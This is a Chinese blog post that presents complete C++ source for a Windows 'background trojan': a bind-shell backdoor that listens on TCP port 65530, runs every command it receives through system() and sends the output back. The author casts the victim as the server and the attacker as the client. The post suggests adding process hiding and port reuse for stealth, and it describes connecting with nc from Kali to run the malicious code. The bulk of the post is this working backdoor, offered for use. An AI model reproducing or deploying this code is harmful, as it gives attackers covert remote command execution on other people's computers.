基于C/C++socket通信的后台木马程序

最新推荐文章于 2024-08-09 20:44:29 发布
最新推荐文章于 2024-08-09 20:44:29 发布
阅读量5.3w 收藏 36
点赞数 2
分类专栏: C/C++ 网络安全 socket 文章标签: C/C++ 网络安全 socket 恶意软件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27180763/article/details/82558420
版权
网络安全 同时被 3 个专栏收录
77 篇文章 4 订阅
订阅专栏
C/C++
32 篇文章 1 订阅
订阅专栏
socket
3 篇文章 1 订阅
订阅专栏

#基于C/C++socket通信的后台木马程序
##什么是socket通信?
网络上的两个程序通过一个双向的通信连接实现数据的交换,这个连接的一端称为一个socket。
建立网络通信连接至少要一对端口号(socket)。socket本质是编程接口(API),对TCP/IP的封装,TCP/IP也要提供可供程序员做网络开发所用的接口,这就是Socket编程接口;HTTP是轿车,提供了封装或者显示数据的具体形式;Socket是发动机,提供了网络通信的能力。
Socket的英文原义是“孔”或“插座”。作为BSD UNIX的进程通信机制,取后一种意思。通常也称作"套接字",用于描述IP地址和端口,是一个通信链的句柄,可以用来实现不同虚拟机或不同计算机之间的通信。在Internet上的主机一般运行了多个服务软件,同时提供几种服务。每种服务都打开一个Socket,并绑定到一个端口上,不同的端口对应于不同的服务。Socket正如其英文原义那样,像一个多孔插座。一台主机犹如布满各种插座的房间,每个插座有一个编号,有的插座提供220伏交流电, 有的提供110伏交流电,有的则提供有线电视节目。 客户软件将插头插到不同编号的插座,就可以得到不同的服务。

##现在我们来基于c/c++的socket来编写一个能够运行在windows上的后门软件,修改后可在linux上运行。

#####所需要的头文件、命名空间和链接库

#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <string>
#include <windows.h>
#include <winsock.h>
#include <list>
#include <vector>

using namespace std;

#pragma comment(lib,"ws2_32.lib")

#####初始化socket库

Socket_TCP_connect() {
		WORD socketversion = MAKEWORD(2, 0);	//初始化版本
		WSADATA	socketData;						//初始化套接字内容
		WSAStartup(socketversion, &socketData);	//初始化socket库
	}

#####建立tcp套接字监听并绑定地址和端口

void Socket_TCP_Bind_Listen(int port = 65530, u_long ip_list = INADDR_ANY)
	{
		s1 = socket(AF_INET, SOCK_STREAM, 0);
		sin1.sin_family = AF_INET;
		sin1.sin_addr.S_un.S_addr = ip_list;
		sin1.sin_port = htons(port);
		bind(s1, (sockaddr *)&sin1, sizeof(sin1));
		listen(s1, 5);
		Socket_TCP_Accept();
	}

#####接受客户端信息

void Socket_TCP_Accept()
	{
		char buffer[1024];
		int addrlen = sizeof(sin2);
		while (true)
		{
			FILE *fp = fopen("123.txt", "w+");
			fclose(fp);
			cout << ">>wait for connect……" << endl;
			s2 = accept(s1, (sockaddr *)&sin2, &addrlen);
			cout << ">>connect from " << inet_ntoa(sin2.sin_addr) << endl;
			while (true)
			{
				int ret = recv(s2, buffer, sizeof(buffer), 0);
				buffer[ret] = 0x00;
				string commend = buffer;
				string cmd = "";
				for (auto &chr : commend)
				{
					if (chr == '\n')
					{
						chr = ' ';
					}
					cmd = cmd + chr;
				}
				cmd = cmd + "> 123.txt";
				char c[1024];
				strcpy(c, cmd.c_str());
				cout << "执行:" << endl;
				cout << c << endl;
				if (system(buffer) == 0)
				{
					send(s2, "OK", strlen("OK"), 0);
					if (system(c) == 0)
					{
						char str[1024] = "";
						FILE *fp2 = fopen("123.txt", "rb+");
						fread(str, sizeof(char), 1024, fp2);
						cout << str;
						send(s2, str, strlen(str), 0);
						fclose(fp2);
					}
				}
			}
			closesocket(s2);
		}
		closesocket(s1);
		WSACleanup();
	}

###核心思想:
本程序可以在主机上打开一个TCP连接,端口号为65530,并且接受客户端发来的指令,通过system()函数运行指令,并通过I/O操作将指令发送至客户端。
被攻击者为socket服务器端,攻击者为客户端。添加进程隐藏和多线程端口复用技术后,可以增加隐蔽性。

###完整源码:

#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <string>
#include <windows.h>
#include <winsock.h>
#include <list>
#include <vector>

using namespace std;

#pragma comment(lib,"ws2_32.lib")

class Socket_TCP_connect {
public:
	//初始化socket库
	Socket_TCP_connect() {
		WORD socketversion = MAKEWORD(2, 0);	//初始化版本
		WSADATA	socketData;						//初始化套接字内容
		WSAStartup(socketversion, &socketData);	//初始化socket库
	}
public:
	//建立tcp套接字监听并绑定地址和端口
	void Socket_TCP_Bind_Listen(int port = 65530, u_long ip_list = INADDR_ANY)
	{
		s1 = socket(AF_INET, SOCK_STREAM, 0);
		sin1.sin_family = AF_INET;
		sin1.sin_addr.S_un.S_addr = ip_list;
		sin1.sin_port = htons(port);
		bind(s1, (sockaddr *)&sin1, sizeof(sin1));
		listen(s1, 5);
		Socket_TCP_Accept();
	}
private:
	//接受客户端信息
	void Socket_TCP_Accept()
	{
		char buffer[1024];
		int addrlen = sizeof(sin2);
		while (true)
		{
			FILE *fp = fopen("123.txt", "w+");
			fclose(fp);
			cout << ">>wait for connect……" << endl;
			s2 = accept(s1, (sockaddr *)&sin2, &addrlen);
			cout << ">>connect from " << inet_ntoa(sin2.sin_addr) << endl;
			while (true)
			{
				int ret = recv(s2, buffer, sizeof(buffer), 0);
				buffer[ret] = 0x00;
				string commend = buffer;
				string cmd = "";
				for (auto &chr : commend)
				{
					if (chr == '\n')
					{
						chr = ' ';
					}
					cmd = cmd + chr;
				}
				cmd = cmd + "> 123.txt";
				char c[1024];
				strcpy(c, cmd.c_str());
				cout << "执行:" << endl;
				cout << c << endl;
				if (system(buffer) == 0)
				{
					send(s2, "OK", strlen("OK"), 0);
					if (system(c) == 0)
					{
						char str[1024] = "";
						FILE *fp2 = fopen("123.txt", "rb+");
						fread(str, sizeof(char), 1024, fp2);
						cout << str;
						send(s2, str, strlen(str), 0);
						fclose(fp2);
					}
				}
			}
			closesocket(s2);
		}
		closesocket(s1);
		WSACleanup();
	}
private:
	SOCKET s1, s2;
	sockaddr_in sin1, sin2;
};

int main()
{
	system("chcp 65001");
	Socket_TCP_connect* conn = new Socket_TCP_connect();
	conn->Socket_TCP_Bind_Listen();
	return 0;
}

###实验效果:
win7下运行恶意程序
kali使用nc连接win7的65530端口执行恶意代码

程序小黑
关注
专栏目录
木马——本质就是cs socket远程控制,反弹木马是作为c端向外发起网络请求
djph26741的博客
09-20 790
摘自:http://kczxsp.hnu.edu.cn/upload/20150504165623705.pdf 里面对于木马的实验过程写得非常清楚,值得一看。 木马是隐藏在正常程序中的具有特殊功能的恶意代码,是具备破坏、删除和 修改文件、发送密码、记录键盘、实施 DOS 攻击甚至完全控制计算机等特殊功 能的后门程序。它隐藏在目标的计算机里,可以随计算机自动启动并在某一端...
C++后台编程一、socket通信
qq_31258245的博客
05-18 460
C++后台编程一、socket通信最近要写一些计算机网络的一些实验,所以最近写一些Linux平台下的后台编程,使用C++语言编写。 没有了Windows下的IDE,所以用的是记事本编写cpp文件,@=@.主要写了两个cpp文件,一个server,另一个client,先上代码,有时间再讲解代码的意思。server.cpp#include<stdio.h> #include<stdlib.h> #in
传智播客c/c++公开课学习笔记--C语言与木马恶意代码分析和360安全防护揭秘
weixin_34290631的博客
05-29 299
黑客代码分析与预防 笔记 【课程简介】 C/C++语言是除了汇编之外,最接近底层的计算机语言,目前windows,linux,iOS,Android等主流操作系统都是用C/C++编写的,所以很多病毒、木马也都是用C/C++实现的。课程的目的就是通过C语言揭秘木马和各种远程控制软件的实现原理以及如何防护。 【课程知识点】 1、木马入侵系统的方式; 2...
C++socket编程
最新发布
k16li的博客
08-09 1076
C++socket编程
C++打造木马程序太牛掰了!堪称计算机的“致命武器”
07-05 2066
C++ 实现简单远程监空木马源代码,这是一个学生的课程设计,远程监控木马源码,利用钩子实现,里面有非常详细的说明文档,对与想深入学习hook 和 进程快照还有指令分析器的人来说本作品最适合,里面的代码十分复杂,建议你们想学习的话最好详细阅读课程设计的文档。 项目结构截图: 源码截图: 测试效果图: 还是需要告诫Android用户,不要随意安装来源不明的应用,虽...
python socket编程制作后门木马(原创)
weixin_30834019的博客
03-28 745
懒得解释怎么写出来的,直接上代码 Client: 简单连接服务器 #!/usr/bin/python #coding:utf-8 import socket import sys socket.setdefaulttimeout(5) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = ...
工作多年C/C++该具备哪些专业技能(进阶C++职业规划)
Linuxhus的博客
01-26 3343
一、C++服务器程序员(流媒体后台,游戏后台,高性能服务器后台) 1. 精通C++,STL,Linux等,熟悉设计模式; 2. 熟练掌握一门脚本语言(Lua, Python, Perl等); 3. 对多线程环境编程有一定的理解,能独立完成服务器端模块的开发、维护和优化; 4. 熟练掌握MySQL数据库的开发维护、性能优化; 1.精通C++编程,3年以上服务器开发经验; 2.有手机游戏或者PC网游开发经验,有过完整手游开发经验者优先; 3.精通Socket协议,了解分布式负载和集群类型的服务器框
工作多年精通C++该具备哪些技能,你会了吗?(进阶C++职业规划)
小白的逆袭
06-20 5184
一、C++服务器程序员(流媒体后台,游戏后台,高性能服务器后台) 1. 精通C++,STL,Linux等,熟悉设计模式; 2. 熟练掌握一门脚本语言(Lua, Python, Perl等); 3. 对多线程环境编程有一定的理解,能独立完成服务器端模块的开发、维护和优化; 4. 熟练掌握MySQL数据库的开发维护、性能优化; 1.精通C++编程,3年以上服务器开发经验; 2.有手机游戏或...
深入了解C++linux工程师的技术需求,为你以后的职业发展定方向
Linuxhus的博客
10-31 370
一、C++服务器程序员(流媒体后台,游戏后台,高性能服务器后台) 1. 精通C++,STL,Linux等,熟悉设计模式; 2. 熟练掌握一门脚本语言(Lua, Python, Perl等); 3. 对多线程环境编程有一定的理解,能独立完成服务器端模块的开发、维护和优化; 4. 熟练掌握MySQL数据库的开发维护、性能优化; 1.精通C++编程,3年以上服务器开发经验; 2.有手机游戏或者PC网游开发经验,有过完整手游开发经验者优先; 3.精通Socket协议,了解分布式负载和集群类型的服务器框
这里有最全的C++工程师的技术需求,你要做哪方面的开发?
weixin_45820912的博客
12-24 935
一、C++服务器程序员(流媒体后台,游戏后台,高性能服务器后台) 1. 精通C++,STL,Linux等,熟悉设计模式; 2. 熟练掌握一门脚本语言(Lua, Python, Perl等); 3. 对多线程环境编程有一定的理解,能独立完成服务器端模块的开发、维护和优化; 4. 熟练掌握MySQL数据库的开发维护、性能优化; 1.精通C++编程,3年以上服务器开发经验; 2.有手机游戏或...
用Visual C++实现远程线程嵌入木马技术
zhihu008的专栏
07-25 5189
远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。 但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程耶!)的地址空间
木马与远程控制
06-14
一些关于木马与远程控制; 木马是如何通信的; 木马是如何控制的; 如何清除木马; 与远程控制的文档学习及代码
C++Hook发包函数核心代码
09-03
C++Hook发包函数核心代码 游戏辅助专用 不得不学 杀猪的
C语言中socket使用讲解。
热门推荐
繁城落叶
11-06 2万+
1.socket定义。在Linux中的网络编程是通过socket接口来进行的。其实socket接口也是一种特殊的I/O(在《深入理解计算机系统》这本书中的IO部分也有提到网络也是一种特殊的IO),它也是一种文件描述符。socket也有一个类似于打开文件的函数调用,该函数返回一个整型的socket描述符,随后的建立连接、数据传输等操作都是通过socket来实现的。2.socket的类型。1 .流式so
VC++动态链接库编程之DLL木马
深之JohnChen的专栏
03-24 2867
VC++动态链接库编程之DLL木马来源: 天极网DLL在程序编制中可作出巨大贡献,它提供了具共性代码的复用能力。但是,正如一门高深的武学,若被掌握在正义之侠的手上,便可助其仗义江湖;但若被掌握在邪恶之徒的手上,则必然在江湖上掀起腥风血雨。DLL正是一种这样的武学。DLL一旦染上了魔性,就不再是正常的DLL程序,而是DLL木马,一种恶贯满盈的病毒,令特洛伊一夜之间国破家亡。 DLL木马的
VC++ 远程控制 屏幕监控 (传说中的木马)
djimon的专栏
01-10 5681
传说中的木马 自已做出来 真的很爽快的感觉 一直都很疑惑,怎么可以控制其它人的机器,这吓好了,SOCKET加屏幕截图功能实际远程控制 ////.h #pragma once #include #pragma comment(lib,"ws2_32.lib") class SDKWind { public: //struct struct SKey{ int typ
木马技术
weixin_30376163的博客
10-23 688
本文参考老书《木马技术揭秘与防御》 #0x00 国内木马历史 97年时,网络尚未在国内普及,木马是当时少数人手里的高科技,那时的木马主要来自国外的BO和SubSeven,直到国产木马冰河出现 才标志国内用户迎来网络木马混沌时代。00年用户对电脑防护意识毫无概念,防火墙又仍在探索和发展,使得冰河木马极其容易渗透进毫 无防备的电脑,许多人也就靠冰河入了门。这个时代的木马缺乏自...
HOOK黑客木马开机启动!小伙子用c++手把手带你进入木马的世界!
05-19 906
# 一 学习目标 这是一段远程控制木马开机启动的代码,主要使用了ActiveX方式启动。结合自己的理解重新整理了笔记。而作为编程新手入门的自己决定要开始梳理学习目的和订下学习的目标。从今天开始要坚持做到 - 1.逼自己去看英文版本的MSDN掌握windowsAPI的使用。 - 2.锻炼编程开发能力,快速开发出安全工具。 - 3.逆向自己编写的程序熟悉反汇编代码来提升自己的逆向能力,因为逆向...
木马c语言,【C语言】后台木马程序
weixin_35561837的博客
05-21 170
该楼层疑似违规已被系统折叠隐藏此楼查看此楼DWORD dwWrited = 0, dwRecvd = 0;char szBuf[MAX_PATH] = {0};BOOL bRet = FALSE;while ( TRUE ) {dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);if ( dwRecvd > 0 && dwRec...
C/C++编程:Socket实现TCP聊天程序详解
"这篇资料是关于使用C/C++语言实现Socket聊天程序的教程,包括了TCP版本的客户端(TCPClient)和初始化Socket的头文件(Initsock.h)。" 在C/C++中,Socket编程用于创建网络通信应用,例如聊天程序。Socket API提供...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

程序小黑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值